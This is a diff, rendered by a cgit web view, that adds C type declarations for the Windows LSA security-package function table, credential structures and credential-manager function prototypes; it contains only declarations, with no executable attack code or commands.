+typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGEEX) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
+typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE_PASSTHROUGH) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ClientBufferBase, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
+typedef BOOLEAN (WINAPI * PLSA_GET_CALL_INFO) (OUT PSECPKG_CALL_INFO Info);
+typedef PVOID (WINAPI * PLSA_CREATE_SHARED_MEMORY) (ULONG MaxSize, ULONG InitialSize);
+typedef PVOID (WINAPI * PLSA_ALLOCATE_SHARED_MEMORY) (PVOID SharedMem, ULONG Size);
+typedef VOID (WINAPI * PLSA_FREE_SHARED_MEMORY) (PVOID SharedMem, PVOID Memory);
+typedef BOOLEAN (WINAPI * PLSA_DELETE_SHARED_MEMORY) (PVOID SharedMem);
+typedef NTSTATUS (WINAPI * PLSA_OPEN_SAM_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, BOOLEAN AllowGuest, ULONG Reserved, PVOID * UserHandle);
+typedef NTSTATUS (WINAPI * PLSA_GET_USER_CREDENTIALS) (PVOID UserHandle, PVOID * PrimaryCreds, PULONG PrimaryCredsSize, PVOID * SupplementalCreds, PULONG SupplementalCredsSize);
+typedef NTSTATUS (WINAPI * PLSA_GET_USER_AUTH_DATA) (PVOID UserHandle, PUCHAR * UserAuthData, PULONG UserAuthDataSize);
+typedef NTSTATUS (WINAPI * PLSA_CLOSE_SAM_USER) (PVOID UserHandle);
+typedef NTSTATUS (WINAPI * PLSA_GET_AUTH_DATA_FOR_USER) (PSECURITY_STRING Name, SECPKG_NAME_TYPE NameType, PSECURITY_STRING Prefix, PUCHAR * UserAuthData, PULONG UserAuthDataSize, PUNICODE_STRING UserFlatName);
+typedef NTSTATUS (WINAPI * PLSA_CONVERT_AUTH_DATA_TO_TOKEN) (IN PVOID UserAuthData, IN ULONG UserAuthDataSize, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN PUNICODE_STRING AuthorityName, OUT PHANDLE Token, OUT PLUID LogonId, OUT PUNICODE_STRING AccountName, OUT PNTSTATUS SubStatus);
+typedef NTSTATUS (WINAPI * PLSA_CRACK_SINGLE_NAME) (IN ULONG FormatOffered, IN BOOLEAN PerformAtGC, IN PUNICODE_STRING NameInput, IN PUNICODE_STRING Prefix OPTIONAL, IN ULONG RequestedFormat, OUT PUNICODE_STRING CrackedName, OUT PUNICODE_STRING DnsDomainName, OUT PULONG SubStatus);
+typedef NTSTATUS (WINAPI * PLSA_AUDIT_ACCOUNT_LOGON) (IN ULONG AuditId, IN BOOLEAN Success, IN PUNICODE_STRING Source, IN PUNICODE_STRING ClientName, IN PUNICODE_STRING MappedName, IN NTSTATUS Status);
+typedef NTSTATUS (WINAPI * PLSA_CLIENT_CALLBACK) (IN PCHAR Callback, IN ULONG_PTR Argument1, IN ULONG_PTR Argument2, IN PSecBuffer Input, OUT PSecBuffer Output);
+typedef NTSTATUS (WINAPI * PLSA_REGISTER_CALLBACK) (ULONG CallbackId, PLSA_CALLBACK_FUNCTION Callback);
+typedef NTSTATUS (WINAPI * PLSA_UPDATE_PRIMARY_CREDENTIALS) (IN PSECPKG_PRIMARY_CRED PrimaryCredentials, IN OPTIONAL PSECPKG_SUPPLEMENTAL_CRED_ARRAY Credentials);
+typedef VOID (WINAPI * PLSA_PROTECT_MEMORY) (IN PVOID Buffer, IN ULONG BufferSize);
+typedef NTSTATUS (WINAPI * PLSA_OPEN_TOKEN_BY_LOGON_ID) (IN PLUID LogonId, OUT HANDLE *RetTokenHandle);
+typedef NTSTATUS (WINAPI * PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN) (IN PUCHAR UserAuthData, IN ULONG UserAuthDataSize, IN PVOID Reserved, OUT PUCHAR * ExpandedAuthData, OUT PULONG ExpandedAuthDataSize);
+
+
+
+#ifndef _ENCRYPTED_CREDENTIAL_DEFINED
+#define _ENCRYPTED_CREDENTIAL_DEFINED
+
+typedef struct _ENCRYPTED_CREDENTIALW {
+ CREDENTIALW Cred;
+ ULONG ClearCredentialBlobSize;
+} ENCRYPTED_CREDENTIALW, *PENCRYPTED_CREDENTIALW;
+#endif // _ENCRYPTED_CREDENTIAL_DEFINED
+
+#define CREDP_FLAGS_IN_PROCESS 0x01 // Caller is in-process. Password data may be returned
+#define CREDP_FLAGS_USE_MIDL_HEAP 0x02 // Allocated buffer should use MIDL_user_allocte
+#define CREDP_FLAGS_DONT_CACHE_TI 0x04 // TargetInformation shouldn't be cached for CredGetTargetInfo
+#define CREDP_FLAGS_CLEAR_PASSWORD 0x08 // Credential blob is passed in in-the-clear
+#define CREDP_FLAGS_USER_ENCRYPTED_PASSWORD 0x10 // Credential blob is passed protected by RtlEncryptMemory
+#define CREDP_FLAGS_TRUSTED_CALLER 0x20 // Caller is a trusted process (eg. logon process).
+
+typedef enum _CredParsedUserNameType
+{
+ parsedUsernameInvalid = 0,
+ parsedUsernameUpn,
+ parsedUsernameNt4Style,
+ parsedUsernameCertificate,
+ parsedUsernameNonQualified
+} CredParsedUserNameType;
+
+
+typedef NTSTATUS (NTAPI CredReadFn) (IN PLUID LogonId, IN ULONG CredFlags, IN LPWSTR TargetName, IN ULONG Type, IN ULONG Flags, OUT PENCRYPTED_CREDENTIALW *Credential);
+typedef NTSTATUS (NTAPI CredReadDomainCredentialsFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PCREDENTIAL_TARGET_INFORMATIONW TargetInfo, IN ULONG Flags, OUT PULONG Count, OUT PENCRYPTED_CREDENTIALW **Credential);
+
+typedef VOID (NTAPI CredFreeCredentialsFn) (IN ULONG Count, IN PENCRYPTED_CREDENTIALW *Credentials OPTIONAL);
+typedef NTSTATUS (NTAPI CredWriteFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PENCRYPTED_CREDENTIALW Credential, IN ULONG Flags);
+typedef NTSTATUS (NTAPI CrediUnmarshalandDecodeStringFn)(IN LPWSTR MarshaledString, OUT LPBYTE *Blob, OUT ULONG *BlobSize, OUT BOOLEAN *IsFailureFatal);
+
+typedef struct _LSA_SECPKG_FUNCTION_TABLE {
+ PLSA_CREATE_LOGON_SESSION CreateLogonSession;
+ PLSA_DELETE_LOGON_SESSION DeleteLogonSession;
+ PLSA_ADD_CREDENTIAL AddCredential;
+ PLSA_GET_CREDENTIALS GetCredentials;
+ PLSA_DELETE_CREDENTIAL DeleteCredential;
+ PLSA_ALLOCATE_LSA_HEAP AllocateLsaHeap;
+ PLSA_FREE_LSA_HEAP FreeLsaHeap;
+ PLSA_ALLOCATE_CLIENT_BUFFER AllocateClientBuffer;
+ PLSA_FREE_CLIENT_BUFFER FreeClientBuffer;
+ PLSA_COPY_TO_CLIENT_BUFFER CopyToClientBuffer;
+ PLSA_COPY_FROM_CLIENT_BUFFER CopyFromClientBuffer;
+ PLSA_IMPERSONATE_CLIENT ImpersonateClient;
+ PLSA_UNLOAD_PACKAGE UnloadPackage;
+ PLSA_DUPLICATE_HANDLE DuplicateHandle;
+ PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS SaveSupplementalCredentials;
+ PLSA_CREATE_THREAD CreateThread;
+ PLSA_GET_CLIENT_INFO GetClientInfo;
+ PLSA_REGISTER_NOTIFICATION RegisterNotification;
+ PLSA_CANCEL_NOTIFICATION CancelNotification;
+ PLSA_MAP_BUFFER MapBuffer;
+ PLSA_CREATE_TOKEN CreateToken;
+ PLSA_AUDIT_LOGON AuditLogon;
+ PLSA_CALL_PACKAGE CallPackage;
+ PLSA_FREE_LSA_HEAP FreeReturnBuffer;
+ PLSA_GET_CALL_INFO GetCallInfo;
+ PLSA_CALL_PACKAGEEX CallPackageEx;
+ PLSA_CREATE_SHARED_MEMORY CreateSharedMemory;
+ PLSA_ALLOCATE_SHARED_MEMORY AllocateSharedMemory;
+ PLSA_FREE_SHARED_MEMORY FreeSharedMemory;
+ PLSA_DELETE_SHARED_MEMORY DeleteSharedMemory;
+ PLSA_OPEN_SAM_USER OpenSamUser;
+ PLSA_GET_USER_CREDENTIALS GetUserCredentials;
+ PLSA_GET_USER_AUTH_DATA GetUserAuthData;
+ PLSA_CLOSE_SAM_USER CloseSamUser;
+ PLSA_CONVERT_AUTH_DATA_TO_TOKEN ConvertAuthDataToToken;
+ PLSA_CLIENT_CALLBACK ClientCallback;
+ PLSA_UPDATE_PRIMARY_CREDENTIALS UpdateCredentials;
+ PLSA_GET_AUTH_DATA_FOR_USER GetAuthDataForUser;
+ PLSA_CRACK_SINGLE_NAME CrackSingleName;
+ PLSA_AUDIT_ACCOUNT_LOGON AuditAccountLogon;
+ PLSA_CALL_PACKAGE_PASSTHROUGH CallPackagePassthrough;
+ CredReadFn *CrediRead;
+ CredReadDomainCredentialsFn *CrediReadDomainCredentials;
+ CredFreeCredentialsFn *CrediFreeCredentials;
+ PLSA_PROTECT_MEMORY LsaProtectMemory;
+ PLSA_PROTECT_MEMORY LsaUnprotectMemory;
+ PLSA_OPEN_TOKEN_BY_LOGON_ID OpenTokenByLogonId;
+ PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN ExpandAuthDataForDomain;
+ PLSA_ALLOCATE_PRIVATE_HEAP AllocatePrivateHeap;
+ PLSA_FREE_PRIVATE_HEAP FreePrivateHeap;
+ PLSA_CREATE_TOKEN_EX CreateTokenEx;
+ CredWriteFn *CrediWrite;
+ CrediUnmarshalandDecodeStringFn *CrediUnmarshalandDecodeString;
+} LSA_SECPKG_FUNCTION_TABLE, *PLSA_SECPKG_FUNCTION_TABLE;
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-29 03:19:44 +0000